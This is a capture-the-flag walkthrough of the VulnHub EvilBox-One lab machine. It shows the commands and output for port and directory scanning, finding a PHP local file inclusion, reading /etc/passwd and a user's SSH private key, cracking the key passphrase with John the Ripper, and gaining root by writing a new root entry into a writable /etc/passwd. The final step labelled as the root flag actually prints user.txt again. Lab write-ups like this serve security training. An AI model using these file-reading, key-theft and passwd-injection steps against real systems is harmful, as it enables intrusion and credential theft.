- Target machine: https://download.vulnhub.com/evilbox/EvilBox---One.ova
- MD5 checksum: c3a65197b891713731e6bb791d7ad259
- Verification commands:
- cmd:
certutil -hashfile file\_path MD5 - powershell:
Get-FileHash file\_path -Algorithm MD5 | Format-List
- cmd:
- VirtualBox required
- Network configuration: Host-Only
- Network setup guide: https://www.cnblogs.com/shadow-/p/16815020.html
Target Analysis
Discovery Phase
Use standard discovery tools:
- arp-scan
- nmap
- netdiscover
- fping
Initial scanning with sudo arp-scan -l -I eth1 showed limitations compared to other tools. Nmap is more suitable for targeted scenning after identifying the host.
Interface: eth1, type: EN10MB, MAC: 08:00:27:5f:50:d7, IPv4: 192.168.56.116
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0d (Unknown: locally administered)
192.168.56.100 08:00:27:15:0f:e5 PCS Systemtechnik GmbH
192.168.56.117 08:00:27:4d:bc:dd PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 2.140 seconds (119.63 hosts/sec). 3 responded
Analysis: - 192.168.56.1 and 192.168.56.100 are gateway and DHCP server addresses - Target is 192.168.56.117
Perform a standard nmap scan: nmap -A -T4 192.168.56.117
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-09 09:41 CST
Nmap scan report for 192.168.56.117
Host is up (0.0012s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 4495500be473a18511ca10ec1ccbd426 (RSA)
| 256 27db6ac73a9c5a0e47ba8d81ebd6d63c (ECDSA)
|_ 256 e30756a92563d4ce3901c19ad9fede64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.77 seconds
Findings: - Port 22: OpenSSH 7.9p1 - Port 80: Apache 2.4.38 - OS: Linux Debian - SSH not viable without credentials or keys - Focus on port 80 for potential vulnerabilities
Web Application Analysis
Initial exploration with Firefox revealed only the default Apache2 Debian page with no useful information.
Use web crawling tools to discover hidden directories:
- dirsearch
- dirb
- dirbuster
- gobuster
- feroxbuster
- ffuf
- wfuzz
Execute with dirsearch --url='192.168.56.117:80/'
┌──(kali㉿kali)-[~]
└─$ dirsearch --url='192.168.56.117:80/'
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/80-_22-11-09_09-52-49.txt
Error Log: /home/kali/.dirsearch/logs/errors-22-11-09_09-52-49.log
Target: http://192.168.56.117:80/
[09:52:49] Starting:
[09:52:52] 403 - 279B - /.ht_wsr.txt
[09:52:52] 403 - 279B - /.htaccess.bak1
[09:52:52] 403 - 279B - /.htaccess.sample
[09:52:52] 403 - 279B - /.htaccess.save
[09:52:52] 403 - 279B - /.htaccess_extra
[09:52:52] 403 - 279B - /.htaccess_orig
[09:52:52] 403 - 279B - /.htaccess_sc
[09:52:52] 403 - 279B - /.htaccess.orig
[09:52:52] 403 - 279B - /.htaccessOLD
[09:52:52] 403 - 279B - /.htaccessOLD2
[09:52:52] 403 - 279B - /.htpasswds
[09:52:52] 403 - 279B - /.html
[09:52:52] 403 - 279B - /.htm
[09:52:52] 403 - 279B - /.htpasswd_test
[09:52:52] 403 - 279B - /.httr-oauth
[09:52:52] 403 - 279B - /.htaccessBAK
[09:54:23] 200 - 12B - /robots.txt
[09:54:25] 200 - 4B - /secret/
[09:54:25] 301 - 317B - /secret -> http://192.168.56.117/secret/
[09:54:25] 403 - 279B - /server-status
[09:54:25] 403 - 279B - /server-status/
[09:53:51] 200 - 10KB - /index.html
Key findings: - /index.html: Default Apache page - /robots.txt: Contains "Hello H4x0r" (potential password clue) - /secret: Directory requiring further investigation
Examine robots.txt content:
The mesage "Hello H4x0r" appears to be a taunt to potential attackers. The term "H4x0r" is leetspeak for "hacker". This could be related to credentials.
Scan the /secret directory with dirsearch --url='192.168.56.117:80/secret' --wordlists=/usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -e txt,php,html,jsp
Alternatively, use gobuster for better performance:
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url='192.168.56.117:80/secret' -w /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt -x txt,php,html,jsp
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.117:80/secret
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,html,jsp
[+] Timeout: 10s
===============================================================
2022/11/09 19:35:29 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 4]
/evil.php (Status: 200) [Size: 0]
Progress: 708415 / 708545 (99.98%)
===============================================================
2022/11/09 19:42:23 Finished
===============================================================
Key finding: /evil.php returns no visible content, suggesting it may process parameters.
Parameter Fuzzing
Use ffuf for parameter fuzzing:
- Parameter dictionary: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
- Value dictionary: var.txt (containing potential payloads)
Build var.txt with potential payloads:
0
1
a
'
"
(
[
{
<
,
;
?
`
/
\
%
ture
false
../robots.txt
H4x0r
Execute ffuf command:
┌──(kali㉿kali)-[~/workspace]
└─$ ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:params -w ./var.txt:var -u http://192.168.56.117/secret/evil.php?params=var -fs 0
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://192.168.56.117/secret/evil.php?params=var
:: Wordlist : params: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Wordlist : var: ./var.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________
[Status: 200, Size: 12, Words: 2, Lines: 2, Duration: 50ms]
* params: command
* var: ../robots.txt
:: Progress: [109701/109701] :: Job [1/1] :: 1599 req/sec :: Duration: [0:02:00] :: Errors: 0 ::
Results: - Parameter name: command - Payload: ../robots.txt (indicating file inclusion vulnerability)
Test file inclusion with http://192.168.56.117/secret/evil.php?command=../robots.txt. The response matches the robots.txt content, confirming a local file inclusion vulnerability.
File Inclusion Exploitation
Test for remote file inclusion:
┌──(kali㉿kali)-[~/workspace]
└─$ ls
var.txt
┌──(kali㉿kali)-[~/workspace]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
-- 水平分割 --
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.56.117/secret/evil.php?command=http://192.168.56.116:80/var.txt"
Remote file inclusion is not supported.
Test PHP wrapper protocols:
┌──(kali㉿kali)-[~/workspace]
└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=../robots.txt"
SGVsbG8gSDR4MGIK
┌──(kali㉿kali)-[~]
└─$ curl "http://192.168.56.117/secret/evil.php?command=php://filter/read=convert.base64-encode/resource=./evil.php" | base64 --decode
% Total % Received % Xferd Average Speed Time Time Time Total Spent Left Speed
100 92 100 92 0 0 8532 0 --:--:-- --:--:-- --:--:-- 9200
<?php $filename = $_GET['command'];
include($filename);
??>
PHP wrapper protocols allow reading files but not writing. The evil.php source confirms a simple file inclusion vulnerability.
Sensitive File Enumeration
Create a dictionary of sensitive system files (file.txt) for enumeration.
Execute enumeration script:
for i in $(cat ./file.txt)
do
echo ">>>$i:"
curl "http://192.168.56.117/secret/evil.php?command=$i"
done
Key findings from enumeration: - /etc/passwd: Reveals a user named "mowree" - /etc/ssh/sshd_config: Default SSH configuration - /etc/ssh/ssh_host_rsa_key.pub: SSH host public key
SSH Key Discovery
Create a dictionary of SSH-related files (ssh_dict.txt) for enumeration.
Execute SSH enumeration script:
for i in $(cat ./ssh_dict.txt);
do
echo "输出 >>>$i:";
curl "http://192.168.56.117/secret/evil.php?command=$i";
done
Key findings: - /home/mowree/.ssh/authorized_keys: Contains an RSA public key - /home/mowree/.ssh/id_rsa: Contains an encrypted RSA private key
SSH Credential Theft
Download the private key:
touch id_rsa && curl "http://192.168.56.117/secret/evil.php?command=/home/mowree/.ssh/id_rsa" > id_rsa && chmod 600 id_rsa
Attempt SSH login with the stolen key:
┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Enter passphrase for key 'id_rsa':
The key is passphrase protected. Use John the Ripper to crack it:
┌──(kali㉿kali)-[~/workspace]
└─$ /usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa
┌──(kali㉿kali)-[~/workspace]
└─$ john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (./id_rsa)
1g 0:00:00:00 DONE (2022-11-10 19:22) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The passphrase is "unicorn". Now attempt SSH login:
┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
Privilege Escalation
Find user.txt flag:
mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ
Check for privilege escalation vectors:
- Sudo permissions: None found
- Kernel exploits: Not viable
- Writable files: /etc/passwd has write permissions
Exploit the writable /etc/passwd to create a new root user with password "123":
root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash
Switch to root:
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree# id
uid=0(root) gid=0(root) grupos=0(root)
Obtain root flag:
root@EvilBoxOne:/home/mowree# cat user.txt
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ